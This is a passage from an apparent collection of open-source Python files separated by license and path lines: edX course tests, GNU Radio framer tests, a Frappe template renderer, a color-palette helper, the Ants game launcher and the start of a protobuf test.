((day1, None, "Spring"), (day1, None, "Fall"), self.assertEqual),
# Partially parsable advertised starts should take priority over start dates
((day2, None, "October 2013"), (day2, None, "October 2012"), self.assertLess),
((day2, None, "October 2013"), (day1, None, "October 2013"), self.assertEqual),
# Parseable advertised starts take priority over start dates
((day1, None, day2), (day1, None, day1), self.assertLess),
((day2, None, day2), (day1, None, day2), self.assertEqual),
]
for a, b, assertion in dates:
a_score = get_dummy_course(start=a[0], announcement=a[1], advertised_start=a[2]).sorting_score
b_score = get_dummy_course(start=b[0], announcement=b[1], advertised_start=b[2]).sorting_score
print "Comparing %s to %s" % (a, b)
assertion(a_score, b_score)
start_advertised_settings = [
# start, advertised, result, is_still_default, date_time_result
('2012-12-02T12:00', None, 'Dec 02, 2012', False, u'Dec 02, 2012 at 12:00 UTC'),
('2012-12-02T12:00', '2011-11-01T12:00', 'Nov 01, 2011', False, u'Nov 01, 2011 at 12:00 UTC'),
('2012-12-02T12:00', 'Spring 2012', 'Spring 2012', False, 'Spring 2012'),
('2012-12-02T12:00', 'November, 2011', 'November, 2011', False, 'November, 2011'),
(xmodule.course_module.CourseFields.start.default, None, 'TBD', True, 'TBD'),
(xmodule.course_module.CourseFields.start.default, 'January 2014', 'January 2014', False, 'January 2014'),
]
@patch('xmodule.course_module.datetime.now')
def test_start_date_text(self, gmtime_mock):
gmtime_mock.return_value = NOW
for s in self.start_advertised_settings:
d = get_dummy_course(start=s[0], advertised_start=s[1])
print "Checking start=%s advertised=%s" % (s[0], s[1])
self.assertEqual(d.start_datetime_text(), s[2])
@patch('xmodule.course_module.datetime.now')
def test_start_date_time_text(self, gmtime_mock):
gmtime_mock.return_value = NOW
for setting in self.start_advertised_settings:
course = get_dummy_course(start=setting[0], advertised_start=setting[1])
print "Checking start=%s advertised=%s" % (setting[0], setting[1])
self.assertEqual(course.start_datetime_text("DATE_TIME"), setting[4])
def test_start_date_is_default(self):
for s in self.start_advertised_settings:
d = get_dummy_course(start=s[0], advertised_start=s[1])
self.assertEqual(d.start_date_is_still_default, s[3])
def test_display_organization(self):
descriptor = get_dummy_course(start='2012-12-02T12:00', is_new=True)
self.assertNotEqual(descriptor.location.org, descriptor.display_org_with_default)
self.assertEqual(descriptor.display_org_with_default, "{0}_display".format(ORG))
def test_display_coursenumber(self):
descriptor = get_dummy_course(start='2012-12-02T12:00', is_new=True)
self.assertNotEqual(descriptor.location.course, descriptor.display_number_with_default)
self.assertEqual(descriptor.display_number_with_default, "{0}_display".format(COURSE))
def test_is_newish(self):
descriptor = get_dummy_course(start='2012-12-02T12:00', is_new=True)
assert(descriptor.is_newish is True)
descriptor = get_dummy_course(start='2013-02-02T12:00', is_new=False)
assert(descriptor.is_newish is False)
descriptor = get_dummy_course(start='2013-02-02T12:00', is_new=True)
assert(descriptor.is_newish is True)
descriptor = get_dummy_course(start='2013-01-15T12:00')
assert(descriptor.is_newish is True)
descriptor = get_dummy_course(start='2013-03-01T12:00')
assert(descriptor.is_newish is True)
descriptor = get_dummy_course(start='2012-10-15T12:00')
assert(descriptor.is_newish is False)
descriptor = get_dummy_course(start='2012-12-31T12:00')
assert(descriptor.is_newish is True)
def test_end_date_text(self):
# No end date set, returns empty string.
d = get_dummy_course('2012-12-02T12:00')
self.assertEqual('', d.end_datetime_text())
d = get_dummy_course('2012-12-02T12:00', end='2014-9-04T12:00')
self.assertEqual('Sep 04, 2014', d.end_datetime_text())
def test_end_date_time_text(self):
# No end date set, returns empty string.
course = get_dummy_course('2012-12-02T12:00')
self.assertEqual('', course.end_datetime_text("DATE_TIME"))
course = get_dummy_course('2012-12-02T12:00', end='2014-9-04T12:00')
self.assertEqual('Sep 04, 2014 at 12:00 UTC', course.end_datetime_text("DATE_TIME"))
class DiscussionTopicsTestCase(unittest.TestCase):
def test_default_discussion_topics(self):
d = get_dummy_course('2012-12-02T12:00')
self.assertEqual({'General': {'id': 'i4x-test_org-test_course-course-test'}}, d.discussion_topics)
class TeamsConfigurationTestCase(unittest.TestCase):
"""
Tests for the configuration of teams and the helper methods for accessing them.
"""
def setUp(self):
super(TeamsConfigurationTestCase, self).setUp()
self.course = get_dummy_course('2012-12-02T12:00')
self.course.teams_configuration = dict()
self.count = itertools.count()
def add_team_configuration(self, max_team_size=3, topics=None):
""" Add a team configuration to the course. """
teams_configuration = {}
teams_configuration["topics"] = [] if topics is None else topics
if max_team_size is not None:
teams_configuration["max_team_size"] = max_team_size
self.course.teams_configuration = teams_configuration
def make_topic(self):
""" Make a sample topic dictionary. """
next_num = self.count.next()
topic_id = "topic_id_{}".format(next_num)
display_name = "Display Name {}".format(next_num)
description = "Description {}".format(next_num)
return {"display_name": display_name, "description": description, "id": topic_id}
def test_teams_enabled_new_course(self):
# Make sure we can detect when no teams exist.
self.assertFalse(self.course.teams_enabled)
# add topics
self.add_team_configuration(max_team_size=4, topics=[self.make_topic()])
self.assertTrue(self.course.teams_enabled)
# remove them again
self.add_team_configuration(max_team_size=4, topics=[])
self.assertFalse(self.course.teams_enabled)
def test_teams_enabled_max_size_only(self):
self.add_team_configuration(max_team_size=4)
self.assertFalse(self.course.teams_enabled)
def test_teams_enabled_no_max_size(self):
self.add_team_configuration(max_team_size=None, topics=[self.make_topic()])
self.assertTrue(self.course.teams_enabled)
def test_teams_max_size_no_teams_configuration(self):
self.assertIsNone(self.course.teams_max_size)
def test_teams_max_size_with_teams_configured(self):
size = 4
self.add_team_configuration(max_team_size=size, topics=[self.make_topic(), self.make_topic()])
self.assertTrue(self.course.teams_enabled)
self.assertEqual(size, self.course.teams_max_size)
def test_teams_topics_no_teams(self):
self.assertIsNone(self.course.teams_topics)
def test_teams_topics_no_topics(self):
self.add_team_configuration(max_team_size=4)
self.assertEqual(self.course.teams_topics, [])
def test_teams_topics_with_topics(self):
topics = [self.make_topic(), self.make_topic()]
self.add_team_configuration(max_team_size=4, topics=topics)
self.assertTrue(self.course.teams_enabled)
self.assertEqual(self.course.teams_topics, topics)
| agpl-3.0 |
gnychis/gnuradio-3.5.0-dmr | gnuradio-core/src/python/gnuradio/gr/qa_fsk_stuff.py | 11 | 2664 | #!/usr/bin/env python
#
# Copyright 2004,2007,2010 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest
import math
def sincos(x):
return math.cos(x) + math.sin(x) * 1j
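# Illustrative note (added for clarity): by Euler's formula the helper above
# returns cos(x) + 1j*sin(x) == exp(1j*x), i.e. a unit-magnitude complex
# sample at phase x.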
class test_bytes_to_syms (gr_unittest.TestCase):
def setUp (self):
self.tb = gr.top_block ()
def tearDown (self):
self.tb = None
def test_bytes_to_syms_001 (self):
src_data = (0x01, 0x80, 0x03)
expected_result = (-1, -1, -1, -1, -1, -1, -1, +1,
+1, -1, -1, -1, -1, -1, -1, -1,
-1, -1, -1, -1, -1, -1, +1, +1)
src = gr.vector_source_b (src_data)
op = gr.bytes_to_syms ()
dst = gr.vector_sink_f ()
self.tb.connect (src, op)
self.tb.connect (op, dst)
self.tb.run ()
result_data = dst.data ()
self.assertEqual (expected_result, result_data)
def test_simple_framer (self):
src_data = (0x00, 0x11, 0x22, 0x33,
0x44, 0x55, 0x66, 0x77,
0x88, 0x99, 0xaa, 0xbb,
0xcc, 0xdd, 0xee, 0xff)
expected_result = (
0xac, 0xdd, 0xa4, 0xe2, 0xf2, 0x8c, 0x20, 0xfc, 0x00, 0x00, 0x11, 0x22, 0x33, 0x55,
0xac, 0xdd, 0xa4, 0xe2, 0xf2, 0x8c, 0x20, 0xfc, 0x01, 0x44, 0x55, 0x66, 0x77, 0x55,
0xac, 0xdd, 0xa4, 0xe2, 0xf2, 0x8c, 0x20, 0xfc, 0x02, 0x88, 0x99, 0xaa, 0xbb, 0x55,
0xac, 0xdd, 0xa4, 0xe2, 0xf2, 0x8c, 0x20, 0xfc, 0x03, 0xcc, 0xdd, 0xee, 0xff, 0x55)
src = gr.vector_source_b (src_data)
op = gr.simple_framer (4)
dst = gr.vector_sink_b ()
self.tb.connect (src, op)
self.tb.connect (op, dst)
self.tb.run ()
result_data = dst.data ()
self.assertEqual (expected_result, result_data)
if __name__ == '__main__':
gr_unittest.run(test_bytes_to_syms, "test_bytes_to_syms.xml")
| gpl-3.0 |
pawaranand/phr-frappe | frappe/website/template.py | 16 | 2988 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import strip_html
from frappe.website.utils import scrub_relative_urls
from jinja2.utils import concat
from jinja2 import meta
import re
def render_blocks(context):
"""returns a dict of block name and its rendered content"""
out = {}
env = frappe.get_jenv()
def _render_blocks(template_path):
source = frappe.local.jloader.get_source(frappe.local.jenv, template_path)[0]
for referenced_template_path in meta.find_referenced_templates(env.parse(source)):
if referenced_template_path:
_render_blocks(referenced_template_path)
template = frappe.get_template(template_path)
for block, render in template.blocks.items():
out[block] = scrub_relative_urls(concat(render(template.new_context(context))))
_render_blocks(context["template"])
# default blocks if not found
if "title" not in out and out.get("header"):
out["title"] = out["header"]
if "title" not in out:
out["title"] = context.get("title")
if "header" not in out and out.get("title"):
out["header"] = out["title"]
if out.get("header") and not out["header"].startswith("<h"):
out["header"] = "<h2>" + out["header"] + "</h2>"
if "breadcrumbs" not in out:
if context.doc and hasattr(context.doc, "get_parents"):
context.parents = context.doc.get_parents(context)
out["breadcrumbs"] = scrub_relative_urls(
frappe.get_template("templates/includes/breadcrumbs.html").render(context))
if "meta_block" not in out:
out["meta_block"] = frappe.get_template("templates/includes/meta_block.html").render(context)
out["no_sidebar"] = context.get("no_sidebar", 0)
if "<!-- no-sidebar -->" in out.get("content", ""):
out["no_sidebar"] = 1
if "<!-- title:" in out.get("content", ""):
out["title"] = re.findall('<!-- title:([^>]*) -->', out.get("content"))[0].strip()
if "{index}" in out.get("content", "") and context.get("children"):
html = frappe.get_template("templates/includes/static_index.html").render({
"items": context["children"]})
out["content"] = out["content"].replace("{index}", html)
if "{next}" in out.get("content", ""):
next_item = context.doc.get_next()
if next_item:
if next_item.name[0]!="/": next_item.name = "/" + next_item.name
html = '''<p><br><a href="{name}" class="btn btn-primary">
{title} <i class="icon-chevron-right"></i></a>
</p>'''.format(**next_item)
out["content"] = out["content"].replace("{next}", html)
if "sidebar" not in out and not out.get("no_sidebar"):
out["sidebar"] = scrub_relative_urls(
frappe.get_template("templates/includes/sidebar.html").render(context))
out["title"] = strip_html(out.get("title") or "")
# remove style and script tags from blocks
out["style"] = re.sub("</?style[^<>]*>", "", out.get("style") or "")
out["script"] = re.sub("</?script[^<>]*>", "", out.get("script") or "")
return out
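# Illustrative sketch (hypothetical template, not part of frappe): a child
# template containing
#     {% block title %}About{% endblock %}
#     {% block content %}<p>Hello</p>{% endblock %}
# would yield roughly {"title": "About", "header": "<h2>About</h2>",
# "content": "<p>Hello</p>", ...} from render_blocks, since missing
# title/header blocks are filled in from each other above.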
| mit |
percyfal/snakemakelib-core | snakemakelib/plot/bokeh/color.py | 1 | 1126 | # Copyright (C) 2015 by Per Unneberg
import math
import pandas.core.common as com
from bokeh.palettes import brewer as bokeh_brewer
from .palettes import brewer as snakemakelib_brewer
import logging
logger = logging.getLogger(__name__)
MINSIZE = 3
MAXSIZE = 9 # FIXME: some palettes have 9 as max, some 11
brewer = bokeh_brewer
brewer.update(snakemakelib_brewer)
def colorbrewer(size=MINSIZE, palette="Paired", datalen=None):
"""Generate a color palette following colorbrewer.
Args:
size (int): size of desired palette
palette (str): name of palette
datalen (int): length of data vector. If None, the palette size
will equal size, else the colors will be reused to fill
up a vector of length datalen
Returns:
palette (list): list of colors
"""
    size = max(MINSIZE, min(size, MAXSIZE))
    if datalen is not None and MINSIZE <= datalen <= MAXSIZE:
        size = datalen
    colors = brewer[palette][size]
    if datalen is not None and datalen > size:
        # repeat the palette often enough to cover the data, then truncate
        colors = colors * int(math.ceil(float(datalen) / size))
        return colors[0:datalen]
    else:
        return colors
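# Hypothetical usage sketch (palette names per the bokeh/snakemakelib brewer):
#   colorbrewer(size=4, palette="Paired", datalen=10)
# repeats the 4-colour "Paired" palette and truncates it to 10 entries, while
# datalen=None simply returns brewer["Paired"][size] unchanged.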
| mit |
jacinda/ant | playgame.py | 1 | 20674 | #!/usr/bin/env python
from __future__ import print_function
import traceback
import sys
import os
import time
from optparse import OptionParser, OptionGroup
import random
import cProfile
import visualizer.visualize_locally
import json
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from ants import Ants
sys.path.append("../worker")
try:
from engine import run_game
except ImportError:
# this can happen if we're launched with cwd outside our own dir
# get our full path, then work relative from that
cmd_folder = os.path.dirname(os.path.abspath(__file__))
if cmd_folder not in sys.path:
sys.path.insert(0, cmd_folder)
sys.path.append(cmd_folder + "/../worker")
# try again
from engine import run_game
# make stderr red text
try:
import colorama
colorama.init()
colorize = True
color_default = (colorama.Fore.RED)
color_reset = (colorama.Style.RESET_ALL)
except:
colorize = False
color_default = None
color_reset = None
class Colorize(object):
def __init__(self, file, color=color_default):
self.file = file
self.color = color
self.reset = color_reset
def write(self, data):
if self.color:
self.file.write(''.join(self.color))
self.file.write(data)
if self.reset:
self.file.write(''.join(self.reset))
def flush(self):
self.file.flush()
def close(self):
self.file.close()
if colorize:
stderr = Colorize(sys.stderr)
else:
stderr = sys.stderr
class Comment(object):
def __init__(self, file):
self.file = file
self.last_char = '\n'
def write(self, data):
for char in data:
if self.last_char == '\n':
self.file.write('# ')
self.file.write(char)
self.last_char = char
def flush(self):
self.file.flush()
def close(self):
self.file.close()
class Tee(object):
''' Write to multiple files at once '''
def __init__(self, *files):
self.files = files
def write(self, data):
for file in self.files:
file.write(data)
def flush(self):
for file in self.files:
file.flush()
def close(self):
for file in self.files:
file.close()
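# Illustrative only: Tee mirrors one stream to several sinks, e.g.
#   log = Tee(sys.stdout, open('game.log', 'w'))
#   log.write('# turn 1\n')   # goes to both stdout and game.log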
def main(argv):
usage ="Usage: %prog [options] map bot1 bot2\n\nYou must specify a map file."
parser = OptionParser(usage=usage)
# map to be played
# number of players is determined by the map file
parser.add_option("-m", "--map_file", dest="map",
help="Name of the map file")
# maximum number of turns that the game will be played
parser.add_option("-t", "--turns", dest="turns",
default=1000, type="int",
help="Number of turns in the game")
parser.add_option("--serial", dest="serial",
action="store_true",
help="Run bots in serial, instead of parallel.")
parser.add_option("--turntime", dest="turntime",
default=1000, type="int",
help="Amount of time to give each bot, in milliseconds")
parser.add_option("--loadtime", dest="loadtime",
default=3000, type="int",
help="Amount of time to give for load, in milliseconds")
parser.add_option("-r", "--rounds", dest="rounds",
default=1, type="int",
help="Number of rounds to play")
parser.add_option("--player_seed", dest="player_seed",
default=None, type="int",
help="Player seed for the random number generator")
parser.add_option("--engine_seed", dest="engine_seed",
default=None, type="int",
help="Engine seed for the random number generator")
parser.add_option('--strict', dest='strict',
action='store_true', default=False,
help='Strict mode enforces valid moves for bots')
parser.add_option('--capture_errors', dest='capture_errors',
action='store_true', default=False,
help='Capture errors and stderr in game result')
parser.add_option('--end_wait', dest='end_wait',
default=0, type="float",
help='Seconds to wait at end for bots to process end')
parser.add_option('--secure_jail', dest='secure_jail',
action='store_true', default=False,
help='Use the secure jail for each bot (*nix only)')
parser.add_option('--fill', dest='fill',
action='store_true', default=False,
help='Fill up extra player starts with last bot specified')
parser.add_option('-p', '--position', dest='position',
default=0, type='int',
help='Player position for first bot specified')
# ants specific game options
game_group = OptionGroup(parser, "Game Options", "Options that affect the game mechanics for ants")
game_group.add_option("--attack", dest="attack",
default="focus",
help="Attack method to use for engine. (closest, focus, support, damage)")
game_group.add_option("--kill_points", dest="kill_points",
default=2, type="int",
help="Points awarded for killing a hill")
game_group.add_option("--food", dest="food",
default="symmetric",
help="Food spawning method. (none, random, sections, symmetric)")
game_group.add_option("--viewradius2", dest="viewradius2",
default=77, type="int",
help="Vision radius of ants squared")
game_group.add_option("--spawnradius2", dest="spawnradius2",
default=1, type="int",
help="Spawn radius of ants squared")
game_group.add_option("--attackradius2", dest="attackradius2",
default=5, type="int",
help="Attack radius of ants squared")
game_group.add_option("--food_rate", dest="food_rate", nargs=2, type="int", default=(5,11),
help="Numerator of food per turn per player rate")
game_group.add_option("--food_turn", dest="food_turn", nargs=2, type="int", default=(19,37),
help="Denominator of food per turn per player rate")
game_group.add_option("--food_start", dest="food_start", nargs=2, type="int", default=(75,175),
help="One over percentage of land area filled with food at start")
game_group.add_option("--food_visible", dest="food_visible", nargs=2, type="int", default=(3,5),
help="Amount of food guaranteed to be visible to starting ants")
game_group.add_option("--carry_food", dest="carry_food", type="int", default=100,
help="Amount of food that ants can carry. If carry_food==0, food is teleported to hill (original game behaviour)")
game_group.add_option("--cutoff_turn", dest="cutoff_turn", type="int", default=150,
help="Number of turns cutoff percentage is maintained to end game early")
game_group.add_option("--cutoff_percent", dest="cutoff_percent", type="float", default=0.85,
help="Number of turns cutoff percentage is maintained to end game early")
game_group.add_option("--scenario", dest="scenario",
action='store_true', default=False)
parser.add_option_group(game_group)
# the log directory must be specified for any logging to occur, except:
# bot errors to stderr
# verbose levels 1 & 2 to stdout and stderr
# profiling to stderr
# the log directory will contain
# the replay or stream file used by the visualizer, if requested
# the bot input/output/error logs, if requested
log_group = OptionGroup(parser, "Logging Options", "Options that control the logging")
log_group.add_option("-g", "--game", dest="game_id", default=0, type='int',
help="game id to start at when numbering log files")
log_group.add_option("-l", "--log_dir", dest="log_dir", default=None,
help="Directory to dump replay files to.")
    log_group.add_option('-R', '--log_replay', dest='log_replay',
                         action='store_true', default=False,
                         help="Save the replay file to the log directory")
    log_group.add_option('-S', '--log_stream', dest='log_stream',
                         action='store_true', default=False,
                         help="Save the stream log to the log directory")
log_group.add_option("-I", "--log_input", dest="log_input",
action="store_true", default=False,
help="Log input streams sent to bots")
log_group.add_option("-O", "--log_output", dest="log_output",
action="store_true", default=False,
help="Log output streams from bots")
log_group.add_option("-E", "--log_error", dest="log_error",
action="store_true", default=False,
help="log error streams from bots")
log_group.add_option('-e', '--log_stderr', dest='log_stderr',
action='store_true', default=False,
help='additionally log bot errors to stderr')
log_group.add_option('-o', '--log_stdout', dest='log_stdout',
action='store_true', default=False,
help='additionally log replay/stream to stdout')
# verbose will not print bot input/output/errors
# only info+debug will print bot error output
log_group.add_option("-v", "--verbose", dest="verbose",
action='store_true', default=False,
help="Print out status as game goes.")
log_group.add_option("--profile", dest="profile",
action="store_true", default=False,
help="Run under the python profiler")
parser.add_option("--nolaunch", dest="nolaunch",
action='store_true', default=False,
help="Prevent visualizer from launching")
log_group.add_option("--html", dest="html_file",
default=None,
help="Output file name for an html replay")
parser.add_option_group(log_group)
(opts, args) = parser.parse_args(argv)
if opts.map is None or not os.path.exists(opts.map):
parser.print_help()
return -1
try:
if opts.profile:
# put profile file into output dir if we can
prof_file = "ants.profile"
if opts.log_dir:
prof_file = os.path.join(opts.log_dir, prof_file)
            # cProfile needs to be explicitly told about our local and global context
print("Running profile and outputting to {0}".format(prof_file,), file=stderr)
cProfile.runctx("run_rounds(opts,args)", globals(), locals(), prof_file)
else:
# only use psyco if we are not profiling
# (psyco messes with profiling)
try:
import psyco
psyco.full()
except ImportError:
pass
run_rounds(opts,args)
return 0
except Exception:
traceback.print_exc()
return -1
def run_rounds(opts,args):
def get_cmd_wd(cmd, exec_rel_cwd=False):
''' get the proper working directory from a command line '''
new_cmd = []
wd = None
for i, part in reversed(list(enumerate(cmd.split()))):
            if wd is None and os.path.exists(part):
wd = os.path.dirname(os.path.realpath(part))
basename = os.path.basename(part)
if i == 0:
if exec_rel_cwd:
new_cmd.insert(0, os.path.join(".", basename))
else:
new_cmd.insert(0, part)
else:
new_cmd.insert(0, basename)
else:
new_cmd.insert(0, part)
return wd, ' '.join(new_cmd)
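    # e.g. get_cmd_wd("python2 bots/mybot.py") would give (hypothetical paths)
    # ("/abs/path/to/bots", "python2 mybot.py"), so the bot runs from its own dir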
def get_cmd_name(cmd):
''' get the name of a bot from the command line '''
        for part in reversed(cmd.split()):
            if os.path.exists(part):
                return os.path.basename(part)
# this split of options is not needed, but left for documentation
game_options = {
"map": opts.map,
"attack": opts.attack,
"kill_points": opts.kill_points,
"food": opts.food,
"viewradius2": opts.viewradius2,
"attackradius2": opts.attackradius2,
"spawnradius2": opts.spawnradius2,
"loadtime": opts.loadtime,
"turntime": opts.turntime,
"turns": opts.turns,
"food_rate": opts.food_rate,
"food_turn": opts.food_turn,
"food_start": opts.food_start,
"food_visible": opts.food_visible,
"carry_food": opts.carry_food,
"cutoff_turn": opts.cutoff_turn,
"cutoff_percent": opts.cutoff_percent,
"scenario": opts.scenario }
    if opts.player_seed is not None:
        game_options['player_seed'] = opts.player_seed
    if opts.engine_seed is not None:
        game_options['engine_seed'] = opts.engine_seed
engine_options = {
"loadtime": opts.loadtime,
"turntime": opts.turntime,
"map_file": opts.map,
"turns": opts.turns,
"log_replay": opts.log_replay,
"log_stream": opts.log_stream,
"log_input": opts.log_input,
"log_output": opts.log_output,
"log_error": opts.log_error,
"serial": opts.serial,
"strict": opts.strict,
"capture_errors": opts.capture_errors,
"secure_jail": opts.secure_jail,
"end_wait": opts.end_wait }
for round in range(opts.rounds):
# initialize game
game_id = round + opts.game_id
with open(opts.map, 'r') as map_file:
game_options['map'] = map_file.read()
if opts.engine_seed:
game_options['engine_seed'] = opts.engine_seed + round
game = Ants(game_options)
# initialize bots
bots = [get_cmd_wd(arg, exec_rel_cwd=opts.secure_jail) for arg in args]
bot_count = len(bots)
        # ensure correct number of bots, or fill in remaining positions
if game.num_players != len(bots):
if game.num_players > len(bots) and opts.fill:
extra = game.num_players - len(bots)
for _ in range(extra):
bots.append(bots[-1])
else:
print("Incorrect number of bots for map. Need {0}, got {1}"
.format(game.num_players, len(bots)), file=stderr)
for arg in args:
print("Bot Cmd: {0}".format(arg), file=stderr)
break
bot_count = len(bots)
# move position of first bot specified
if opts.position > 0 and opts.position <= len(bots):
first_bot = bots[0]
bots = bots[1:]
bots.insert(opts.position, first_bot)
# initialize file descriptors
if opts.log_dir and not os.path.exists(opts.log_dir):
os.mkdir(opts.log_dir)
if not opts.log_replay and not opts.log_stream and (opts.log_dir or opts.log_stdout):
opts.log_replay = True
replay_path = None # used for visualizer launch
if opts.log_replay:
if opts.log_dir:
replay_path = os.path.join(opts.log_dir, '{0}.replay'.format(game_id))
engine_options['replay_log'] = open(replay_path, 'w')
if opts.log_stdout:
if 'replay_log' in engine_options and engine_options['replay_log']:
engine_options['replay_log'] = Tee(sys.stdout, engine_options['replay_log'])
else:
engine_options['replay_log'] = sys.stdout
else:
engine_options['replay_log'] = None
if opts.log_stream:
if opts.log_dir:
engine_options['stream_log'] = open(os.path.join(opts.log_dir, '{0}.stream'.format(game_id)), 'w')
if opts.log_stdout:
if engine_options['stream_log']:
engine_options['stream_log'] = Tee(sys.stdout, engine_options['stream_log'])
else:
engine_options['stream_log'] = sys.stdout
else:
engine_options['stream_log'] = None
if opts.log_input and opts.log_dir:
engine_options['input_logs'] = [open(os.path.join(opts.log_dir, '{0}.bot{1}.input'.format(game_id, i)), 'w')
for i in range(bot_count)]
else:
engine_options['input_logs'] = None
if opts.log_output and opts.log_dir:
engine_options['output_logs'] = [open(os.path.join(opts.log_dir, '{0}.bot{1}.output'.format(game_id, i)), 'w')
for i in range(bot_count)]
else:
engine_options['output_logs'] = None
if opts.log_error and opts.log_dir:
if opts.log_stderr:
if opts.log_stdout:
engine_options['error_logs'] = [Tee(Comment(stderr), open(os.path.join(opts.log_dir, '{0}.bot{1}.error'.format(game_id, i)), 'w'))
for i in range(bot_count)]
else:
engine_options['error_logs'] = [Tee(stderr, open(os.path.join(opts.log_dir, '{0}.bot{1}.error'.format(game_id, i)), 'w'))
for i in range(bot_count)]
else:
engine_options['error_logs'] = [open(os.path.join(opts.log_dir, '{0}.bot{1}.error'.format(game_id, i)), 'w')
for i in range(bot_count)]
elif opts.log_stderr:
if opts.log_stdout:
engine_options['error_logs'] = [Comment(stderr)] * bot_count
else:
engine_options['error_logs'] = [stderr] * bot_count
else:
engine_options['error_logs'] = None
if opts.verbose:
if opts.log_stdout:
engine_options['verbose_log'] = Comment(sys.stdout)
else:
engine_options['verbose_log'] = sys.stdout
engine_options['game_id'] = game_id
if opts.rounds > 1:
print('# playgame round {0}, game id {1}'.format(round, game_id))
# intercept replay log so we can add player names
if opts.log_replay:
intcpt_replay_io = StringIO()
real_replay_io = engine_options['replay_log']
engine_options['replay_log'] = intcpt_replay_io
result = run_game(game, bots, engine_options)
# add player names, write to proper io, reset back to normal
if opts.log_replay:
replay_json = json.loads(intcpt_replay_io.getvalue())
replay_json['playernames'] = [get_cmd_name(arg) for arg in args]
real_replay_io.write(json.dumps(replay_json))
intcpt_replay_io.close()
engine_options['replay_log'] = real_replay_io
# close file descriptors
if engine_options['stream_log']:
engine_options['stream_log'].close()
if engine_options['replay_log']:
engine_options['replay_log'].close()
if engine_options['input_logs']:
for input_log in engine_options['input_logs']:
input_log.close()
if engine_options['output_logs']:
for output_log in engine_options['output_logs']:
output_log.close()
if engine_options['error_logs']:
for error_log in engine_options['error_logs']:
error_log.close()
if replay_path:
if opts.nolaunch:
if opts.html_file:
visualizer.visualize_locally.launch(replay_path, True, opts.html_file)
else:
                if opts.html_file is None:
visualizer.visualize_locally.launch(replay_path,
generated_path="replay.{0}.html".format(game_id))
else:
visualizer.visualize_locally.launch(replay_path,
generated_path=opts.html_file)
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
| gpl-2.0 |
jjas0nn/solvem | tensorflow/lib/python2.7/site-packages/google/protobuf/internal/symbol_database_test.py | 43 | 5386 | #! /usr/bin/env python
#
# Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for google.protobuf.symbol_database."""
try:
import unittest2 as unittest #PY26
except ImportError:
import unittest
from google.protobuf import unittest_pb2
from google.protobuf import descriptor
from google.protobuf import descriptor_pool
from google.protobuf import symbol_database
class SymbolDatabaseTest(unittest.TestCase):
def _Database(self):
if descriptor._USE_C_DESCRIPTORS:
# The C++ implementation does not allow mixing descriptors from
# different pools.
db = symbol_database.SymbolDatabase(pool=descriptor_pool.Default())
else:
db = symbol_database.SymbolDatabase()
# Register representative types from unittest_pb2.
db.RegisterFileDescriptor(unittest_pb2.DESCRIPTOR)
db.RegisterMessage(unittest_pb2.TestAllTypes)
db.RegisterMessage(unittest_pb2.TestAllTypes.NestedMessage)
db.RegisterMessage(unittest_pb2.TestAllTypes.OptionalGroup)
db.RegisterMessage(unittest_pb2.TestAllTypes.RepeatedGroup)
db.RegisterEnumDescriptor(unittest_pb2.ForeignEnum.DESCRIPTOR)
db.RegisterEnumDescriptor(unittest_pb2.TestAllTypes.NestedEnum.DESCRIPTOR)
return db
def testGetPrototype(self):
instance = self._Database().GetPrototype(
unittest_pb2.TestAllTypes.DESCRIPTOR)
self.assertTrue(instance is unittest_pb2.TestAllTypes)
def testGetMessages(self):
messages = self._Database().GetMessages(
['google/protobuf/unittest.proto'])
self.assertTrue(
unittest_pb2.TestAllTypes is
messages['protobuf_unittest.TestAllTypes'])
def testGetSymbol(self):
self.assertEqual(
unittest_pb2.TestAllTypes, self._Database().GetSymbol(
'protobuf_unittest.TestAllTypes'))
self.assertEqual(
unittest_pb2.TestAllTypes.NestedMessage, self._Database().GetSymbol(
'protobuf_unittest.TestAllTypes.NestedMessage'))
self.assertEqual(
unittest_pb2.TestAllTypes.OptionalGroup, self._Database().GetSymbol(
'protobuf_unittest.TestAllTypes.OptionalGroup'))
self.assertEqual(
unittest_pb2.TestAllTypes.RepeatedGroup, self._Database().GetSymbol(
'protobuf_unittest.TestAllTypes.RepeatedGroup'))
def testEnums(self):
